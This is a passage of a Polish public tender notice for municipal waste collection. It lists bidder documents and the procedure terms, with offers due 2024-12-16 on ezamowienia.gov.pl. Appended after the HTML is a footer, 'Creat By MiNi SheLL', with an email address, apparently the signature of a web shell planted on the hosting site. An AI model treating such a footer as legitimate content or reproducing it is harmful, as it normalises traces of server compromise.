zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.<br/> 5) Pełnomocnictwo złożone w formie oryginału lub notarialnie poświadczonej kopii w sytuacji:<br/> 5.1) Wykonawców wspólnie ubiegających się o udzielenie zamówienia – pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy,<br/> 5.2) podpisania oferty względnie innych dokumentów składanych wraz z ofertą przez osobę, dla której prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą – pełnomocnictwo do podpisania oferty.<br/> 6) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenia, <br/>o których mowa w punkcie 2 i 3 składa każdy z Wykonawców wspólnie ubiegających się <br/>o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. <br/> 7) Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniach, o których mowa w punkcie 2 i 3.<br/> 8) W przypadku ubiegania się o zamówienie przez spółkę cywilną dołączenie umowy spółki cywilnej. <br/> 9) Oświadczenie, z podaniem adresu do której instalacji komunalnej będą przekazywane odpady komunalne Zamawiającego. Wzór oświadczenia stanowi załącznik nr 6 do SWZ<br/> <br/> 2. Dokumenty i oświadczenia składane – na wezwanie Zamawiającego – przez Wykonawcę, którego oferta została najwyżej oceniona. <br/> <br/> W terminie nie krótszym niż 5 dni Zamawiający wezwie wykonawcę, którego oferta będzie najkorzystniejsza do złożenia:<br/> - Oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej.<br/> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie <br/>o przynależności braku przynależności do tej samej grupy kapitałowej, składa każdy <br/> z Wykonawców. Wzór oświadczenia stanowi załącznik nr 4 do SWZ.<br/> - Wpisu do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, prowadzonego przez wójta, burmistrza lub prezydenta miasta właściwego ze względu na miejsce odbierania odpadów komunalnych,<br/> - Listy pojazdów i sprzętu potrzebnego do realizacji zamówienia.<br/> <br/>Wykonawca, którego oferta zostanie najwyżej oceniona, na wezwanie Zamawiającego zobowiązany będzie złożyć oświadczenia i dokumenty podmiotu, na zdolności lub sytuację którego Wykonawca powoływał się w celu wykazania spełniania warunków udział w postępowaniu. Wykonawca zobowiązany będzie złożyć dokumenty tego podmiotu potwierdzające spełnianie warunków udziału w postępowaniu w zakresie zdolności lub sytuacji, na których Wykonawca polegał w celu wykazania spełniania tych warunków.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-16 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-16 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com